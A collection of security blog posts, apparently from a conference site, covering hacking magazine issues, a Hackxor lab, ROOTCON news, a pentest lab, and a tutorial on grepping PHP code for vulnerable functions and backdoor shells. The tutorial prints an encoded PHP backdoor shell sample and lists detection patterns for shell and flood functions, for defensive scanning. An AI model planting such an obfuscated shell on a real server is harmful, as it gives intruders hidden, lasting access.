India's 1st hacking magazine, ClubHack or CHmag, has just released its April 2012 issue. CHmag happens to be our media partner, and it is one of the hacking/infosec magazines I'm currently following because of the good content from various authors; for this issue I also contributed an article for the Mom's Guide. Here are the topics for this month's issue:

- Decoding ROT using the Echo and Tr Commands in your Linux Terminal
- How to enable WiFi on Matriux running inside VMWare
- Local File Inclusion
- Poster of the Month
- Provisions of Sec. 66B
- Sysinternals Suite
- XSS – The Burning issue in Web Application

The new burner for this issue is the new section, Code Gyan, which starts with a topic entitled Local File Inclusion.

You can download the PDF file here, or check out the archives for their previous issues on their official website.



Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells

Grep is a powerful command-line tool in Unix and Linux used for searching data sets for lines that match a regular expression. As a bit of history, this utility was coded by Ken Thompson on March 3, 1973 for Unix.

Here is a sample of common usage of the tool, searching for the text string pBot in my PHP file bot.php (grep is case-sensitive, so -i is used to match pBot whatever its capitalisation):

grep -i pbot bot.php

Alright, let's proceed to the objective of this article, which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9, so if you are using an older version of GNU grep, below 2.5.4, some of the commands in this article may not work. To determine the version of grep, just type grep -V or grep --version in your terminal. For the other options and arguments that can be appended to this command-line kung fu, type grep --help for more information.
Common Usage for Finding Vulnerabilities
The very reason most web applications can be easily hacked or pwned is insecure code and functions that can be exploited. Take command injection, also known as remote code execution in terms of web exploitation: it becomes possible when a website accepts attacker-supplied strings or arguments and uses them as arguments to a command executed on the web server. Because most vulnerable web applications use the shell_exec function, we can use grep to search for shell_exec under our /var/www directory and find PHP files that may be vulnerable to RCE or command injection. Here is the command:

grep -Rn "shell_exec *(" /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line of the function.

Another example: include, require, include_once and require_once are common PHP functions found in scripts vulnerable to LFI or Local File Inclusion, a vulnerability that allows an attacker to inject directory traversal characters into a file path used by the website.

Again, we can grep for these functions to find possibly vulnerable scripts on our web server:

grep -Rn "include *(" /var/www
grep -Rn "require *(" /var/www
grep -Rn "include_once *(" /var/www
grep -Rn "require_once *(" /var/www
There are other PHP functions out there that can also be used for finding other web vulnerabilities. Just use Google for other functions :)

Grepping for Backdoor Shells and other Malicious Files


Backdoors are used by web defacers and hackers to maintain access to the web server, which allows them to execute arbitrary commands, download files, edit files, and back-connect. Most backdoor shells use the shell_exec function for command execution. And because most anti-virus and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell with only upload and system-information functions, encoded using the Carbylamine PHP Encoder:


<?php
// Decoder stub: inflate the base64 payload, then shift every byte down by one
function KJnPCP($XZK)
{
    $XZK = gzinflate(base64_decode($XZK));
    for ($i = 0; $i < strlen($XZK); $i++) {
        $XZK[$i] = chr(ord($XZK[$i]) - 1);
    }
    return $XZK;
}
eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypFzNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

Aside from shell_exec, base64_decode and eval, here are other functions used by PHP backdoor shells:

phpinfo
system
php_uname
chmod
fopen
fclose
readfile
edoced_46esab (base64_decode spelled backwards)
passthru

Thus you could also easily grep for these functions:


grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www 
grep -Rn "passthru *(" /var/www
 
In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might wanna add the strings tcpflood and udpflood when grepping for malicious files too, because these are commonly used by IRC bots that have udpflood and tcpflood functions.
What you saw in the image above is a sample of pBot, a PHP IRC bot used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also search for all of these common functions at once with a single command in your terminal:


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www
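As an added example (not code from the original post), the following script turns the same grep checks into a per-file triage: it counts matching lines per PHP file under a web root and flags any file that pairs eval( with base64_decode( or gzinflate(, the pattern of the encoded shell shown above. The function list (the one-liner above plus gzinflate), the thresholds and the verdict names are my own choices.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: grep-based triage of a web root.

# Dangerous-function alternation: the list from the one-liner above plus gzinflate,
# which encoder stubs such as the Carbylamine sample use alongside base64_decode.
SUSPECT_FUNCS='passthru|shell_exec|system|phpinfo|base64_decode|gzinflate|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab'

# hits_per_file DIR: print "COUNT FILE" for every PHP file with at least one
# matching line, noisiest file first. grep -c reports "file:count" per file;
# awk keeps only the non-zero ones (the last ':' field is the count).
hits_per_file() {
  grep -rPc --include='*.php' "\b(${SUSPECT_FUNCS}) *\(" "$1" \
    | awk -F: '$NF > 0 { printf "%d %s\n", $NF, substr($0, 1, length($0)-length($NF)-1) }' \
    | sort -rn
}

# classify_file FILE: print "encoded-shell", "suspicious" or "clean".
# encoded-shell = eval( together with base64_decode( or gzinflate( in the same
# file, which is what PHP encoder output looks like; suspicious = any function
# from the list (legitimate code uses fopen/chmod too, so this needs a human).
classify_file() {
  local f="$1"
  if grep -qP 'eval *\(' "$f" && grep -qP '(base64_decode|gzinflate) *\(' "$f"; then
    echo encoded-shell
  elif grep -qP "\b(${SUSPECT_FUNCS}) *\(" "$f"; then
    echo suspicious
  else
    echo clean
  fi
}

# triage DIR: one line per flagged PHP file, "VERDICT HITS FILE".
triage() {
  hits_per_file "$1" | while read -r count file; do
    printf '%s %s %s\n' "$(classify_file "$file")" "$count" "$file"
  done
}

# Usage: triage /var/www
```

Review the "suspicious" files by hand; "encoded-shell" files are the ones to pull off the server first and compare against a known-good copy.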



Hackxor - Web App Hacking Game

Are you a gamer and at the same time a penetration testing enthusiast in web applications?

Well then, you might wanna try whacking out 'hackxor'! Hackxor is a web application hacking game where players must locate and exploit vulnerabilities to progress through the story, in which you play as a blackhat hacker hired to track down another hacker by any means possible. It contains scripts vulnerable to Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Structured Query Language Injection (SQLi), Remote Command Injection (RCE), and many more. It ships as a web application running on Fedora 14.

Download & install instructions

1. Download the full version of hackxor (700mb)
2. Install VMWare Player (this involves creating a free account with VMware)
3. Extract hackxor1.7z and run the image using VMware Player.
4. Work out what the IP of hackxor is (try 172.16.93.129, or log into the VM with username root, password hackxor and type ifconfig)
5. Configure your hosts file (/etc/hosts on Linux) to redirect the following domains to the IP of hackxor: wraithmail, wraithbox, cloaknet, GGHB, hub71, utrack.
6. Browse to http://wraithmail:8080 and log in with username algo, password smurf




May 2012 issue of ClubHack Magazine is out now!

ClubHack Magazine's May 2012 issue was released yesterday, guys, and thanks to the CHmag team for giving us free monthly issues!


Topics:
0x01 - Steganography over covert channels (Tech Gyan)
0x02 - Kautilya (Tool Gyan)
0x03 - Section 66C - Punishment for identity theft (Legal Gyan)
0x04 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Guide)
0x05 - Don't Get Injected – Fix Your Code (Code Gyan)

Download the new issue here.

Early Registration Closing Soon!!!!


Our two-month run of early registration will be closing this coming June 30, 2012. If you haven't registered yet, register now to get big discounts!!!

Visit the registration page now!!!

New CFP Submission

A new CFP submission has landed in our inbox.

Topic Details

Presentation Title: Randomized/Obfuscated Text Detection
Synopsis: Recent malware has been using obfuscation techniques to hide its code from antivirus software. Making use of emulation is very effective, but would probably result in a slow-performing machine, especially when your valid apps are being scanned for malware. Thus, before a full emulation is done, static detection can help minimize this slowdown. Detecting the existence of obfuscated text segregates valid applications from malware. This topic shows different methods of determining whether a certain text is randomized.


Speaker: Reginald Wong
Speaker Background: Reggie has been in the anti-malware industry for almost 10 years doing research on different types of malware. He currently heads the heuristics team at GFI Software Philippines and aims to detect malware before it gets into your system.


More at https://www.rootcon.org/xml/rootcon6/tracks

ROOTCON 6 Call For Papers Now Closed

ROOTCON 6 Call For Papers is now closed; we would like to thank everyone who submitted. For those who were not accepted, you can still enjoy the fun at ROOTCON by registering, socializing, networking, learning and having fun.

Pre-final tracks can be found here

Get to know our ub3r4w3s()me speakers here

We will be posting ROOTCON 6 schedule soon.

What are you waiting for? Register now (Early Registration closing on June 30, 2012) and witness the fun and educational event this coming September 7-8, 2012.

Hope to see you all at the CON.

8 Hacking and Information Security Magazines You Might Wanna Read

As a programming student, security researcher and blogger, I always keep up to date with what is happening in cyberspace by reading infosec articles and magazines. The magazines I usually read have niches or themes like Information Security, Cyber Warfare, Cyber Espionage, Penetration Testing and Hacking. So here are 8 Hacking and Information Security Magazines that I'd like to share with all of you:


1. Hakin9 - Hakin9 Magazine is a paid magazine devoted to IT security that covers techniques for breaking into computer systems, defense and protection methods, tools and the latest trends in IT security. It has 4 different editions every month: Hakin9, the main issue; Hakin9 Extra, where every issue is devoted to one topic only; Exploiting Software magazine, covering partition analysis, stack overflows and many more; and Mobile Security, on hacking and securing mobile systems and applications.



2. PenTest Magazine - PenTest Magazine is a paid magazine which focuses on penetration testing. It features articles by penetration testing specialists, enthusiasts, and experts in vulnerability assessment and management. PenTest Magazine publishes 48 issues a year, 4 issues a month, with a different title every week: PenTest Regular, Auditing & Standards PenTest, PenTest Market, and Web App Pentesting. Their team is also behind the Certified PenTest Laboratory Tester (CPLT) certification.



3. ClubHack Magazine - ClubHack Magazine or CHmag is India's 1st Hacking Magazine and one of the media partners of ROOTCON. Their magazine is free to download and is divided into the following sections: Tech Gyan,  Legal Gyan, Tool Gyan, Mom's Guide, Matriux Vibhag, and Code Gyan. I also contributed one article to this magazine which is about Decoding ROT using the Echo and Tr Commands in your Linux Terminal. They are also the organizers of ClubHack Conference.


4. (IN)SECURE Magazine - (IN)SECURE Magazine is a free digital security publication discussing information security topics, published by Help Net Security, which has been a prime resource for information security news since 1998. They also accept guest authors and have a lot of subscribers.


5. Phrack Magazine - Nothing beats the old school! Nobody messes with Phrack Magazine, an online ezine for hackers and by hackers. Phrack was first released on November 17, 1985 and has since become the largest computer underground ezine. In fact, The Hacker's Manifesto was also published in this ezine, in the 7th issue. Truly an old yet awesome archive which takes you back to the days of the hacker culture of the 80s. The current issue is 68; I thought it would end at issue number 63, but the good thing is it is still alive and kicking.



6. 2600: The Hacker Quarterly - 2600: The Hacker Quarterly is a publication that focuses on subjects like phreaking, infosec, hacking, the computer underground, anarchist issues, and many more. 2600 has established the H.O.P.E. (Hackers On Planet Earth) conferences as well as monthly meetings in some countries.



7. Hacker5 - Hacker5 is a monthly magazine from India which provides you with some of the latest happenings in the cyber world. Their team is composed of journalists and ethical hackers. Some of their issues are free to download and some are paid. On their website, they also have a dedicated page for the hackers, security professionals and developers they have interviewed.



8. Hacker Monthly - Hacker Monthly is the print magazine edition of Hacker News, a well-known social bookmarking news website popular among programmers, SEO specialists, link builders, developers, geeks and startup founders. Every month they select from the top-voted articles bookmarked on the Hacker News website and print them in magazine format, but it is not free anymore.



Checking out BackTrack Linux 5r2-PenTesting Edition Lab!


What's a BackTrack Linux 5r2-PenTesting Edition Lab? What's with the edition thingy? Isn't BackTrack 5 a pentesting distro already? Why make a pentesting edition?

Maybe these are some of the questions in your mind after reading the title, so I would like to give a few points about this edition.

BackTrack Linux 5r2-PenTesting Edition Lab is still the same BackTrack 5 r2, with the same pentesting tools pre-installed in the distribution and KDE as its desktop environment (on backtrack-linux.org you can also choose between Gnome and KDE). The only difference is that it includes all of the hosts, network infrastructure, tools and targets necessary to practice penetration testing for the CPLT or Certified PenTest Laboratory course, which is brought to you by PenTest Laboratory and the guys behind PenTest Magazine.

This edition is a modified version of NETinVM, which has predefined User-mode Linux (UML) based penetration testing targets. When started, it builds an entire network of machines within the VMware virtual machine. The BackTrack Linux distribution is used to provide the tools necessary for completing the lab scenarios. Thus it is an all-in-one penetration testing lab environment that comes pre-configured with:

- A master (base) host utilizing BackTrack Linux 5r2
- A DMZ network with two hosts (targets)
- An “internal” network with one host (target)
- A pre-configured firewall

This pentesting lab is available for free to non-CPLT course students and can be downloaded here.

Here are some of the targets you can attack or play with:

- 10.5.0.1
- 10.5.0.254
- 10.5.1.10
- 10.5.1.254

